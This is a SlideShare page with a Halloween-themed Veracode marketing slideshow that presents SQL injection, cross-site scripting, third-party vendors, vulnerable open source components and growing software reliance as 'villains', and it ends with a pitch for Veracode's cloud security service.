Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.

The Top 5 AppSec Villains (Happy Halloween from Veracode!)


Published on

We’ve all been dealing with all kinds of AppSec villains for a long time – but perhaps you’ve never visualized them in exactly this way. Check out this fun presentation to learn about the top 5 villains – and how you can defeat them. Do you dare enter this haunted house?

Published in: Education
  • Be the first to comment

  • Be the first to like this

The Top 5 AppSec Villains (Happy Halloween from Veracode!)

  1. 1. The Top 5 Application Security Villains TOUR THE HAUNTED HOUSE DARE TO ENTER TO ENCOUNTER THEM HAPPY HALLOWEEN! From Veracode
  2. 2. THIS WAY
  3. 3. SQL INJECTION Watch out! SQL injection breaches, like mummies, keep coming back to life. According to the 2014 Verizon DBIR, 80% of retail breaches targeting web applications exploit SQL injection vulnerabili-ties. Cyberattackers are constantly searching every nook and cranny of your web applications to find easily-exploitable weak spots such as SQLi — a critical vulnerability which has been on the OWASP Top 10 forever!
  4. 4. CROSS-SITE SCRIPTING (XSS) Another “greatest hit” from the OWASP Top 10, cross-site scripting allows a cyberattacker to inject arbitrary scripts into an unsuspecting website which are then executed by the victim’s browser. Just like Dracula’s bite takes over your soul, XSS allows the attacker to place its victims under their total control‚ leaving you vulnerable to scary and malicious activities such as sensitive data theft, data tampering and session hijacking.
  5. 5. THIRD-PARTY VENDORS Recent high-profile breaches have shown that cyberattackers relish casting their evil spells on third-party vendors. This isn’t surprising — 90% of third-party software doesn’t comply with the OWASP Top 10. That makes it especially vulnerable to attackers who target third-party vendors as the path of least resistance into organizations. Then they methodically traverse your network, casting spells to gain more powers and elevated privileges as they go.
  6. 6. VULNERABLE OPEN SOURCE COMPONENTS As we learned from Heartbleed and Shellshock, open source com-ponents often don’t undergo the same level of security scrutiny as in-house software. In fact, open source and commercial third-party components contribute an average of 24 known vulnerabilities into every web application. Just like werewolves that start out as ordi-nary humans, “friendly” compo-nents are easily transformed into dangerous creatures that expose organizations to malevolent threats including data breaches, malware injections and DoS attacks.
  7. 7. APPLICATIONS ARE THE NEW FRANKENSTEIN Companies large and small, across all industries, rely on software innovation to drive their businesses. Just like Frankenstein’s creators didn’t know how big and powerful he would be, we couldn’t have predicted that our increased reliance on web, mobile, cloud and Internet of Things technologies would also lead to a massive increase in risk.
  8. 8. Veracode’s cloud-based service is a simpler and more scalable way to reduce application-layer risk across your global software infrastructure, including web, mobile and third-party applications. With Veracode, you can speed your innovations to market — while defeating these vile application security villains along the way!